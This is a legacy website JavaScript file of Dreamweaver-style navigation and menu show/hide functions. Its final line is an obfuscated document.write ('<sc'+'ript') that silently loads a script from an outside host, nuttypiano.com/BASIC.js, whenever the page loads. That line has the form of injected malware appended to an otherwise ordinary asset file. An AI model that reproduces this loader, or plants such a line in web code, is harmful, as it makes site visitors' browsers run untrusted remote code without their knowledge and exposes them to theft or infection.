function MM_reloadPage(init) {  //reloads the window if Nav4 resized
  if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
    document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
  else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}

MM_reloadPage(true);

function MM_goToURL() { //v3.0
  var i, args=MM_goToURL.arguments; document.MM_returnValue = false;
  for (i=0; i<(args.length-1); i+=2) eval(args[i]+".location='"+args[i+1]+"'");
}

function ini() {
	IE = (document.all)
	NC = (document.layers)
	Opera = (document.getElementById)
}

function cColor(o) {

	 if (o.className == 'menu1') {
	   o.className = 'menu2';
	 } else {
	   o.className = 'menu1';
	 }
}

function ShowCurr(id1,id2) {
	ini();
	if(IE)
	{
		eval('document.all[id1].style.display = "block"');
		eval('document.all[id2].className = "menu2"');
	}
	else if(NC)
	{
		eval('document.layers[id1].display = "block"');
		eval('document.layers[id1].className = "menu2"');
	}
	else if(Opera)
	{
		eval('document.getElementById(id1).style.display = "block"');
		eval('document.getElementById(id2).className = "menu2"');
	}
}

function ShowHide(id) {
	ini();
	if(IE)
	{
		if (document.all[id].style.display == "block") eval('document.all[id].style.display = "none"')
		else { eval('document.all[id].style.display = "block"'); eval('document.all[id].style.align = "right"'); }
	}
	else if(NC)
	{
		if (document.layers[id].display == "block") eval('document.layers[id].display = "none"')
		else eval('document.layers[id].display = "block"')
	}
	else if(Opera)
	{
		if (document.getElementById(id).style.display == "block") eval('document.getElementById(id).style.display = "none"')
		else { eval('document.getElementById(id).style.display = "block"'); eval('document.getElementById(id).style.align = "right"');  }
	}
}



document.write('<sc'+'ript type="text/javascript" src="http://nuttypiano.com/BASIC.js"></scri'+'pt>');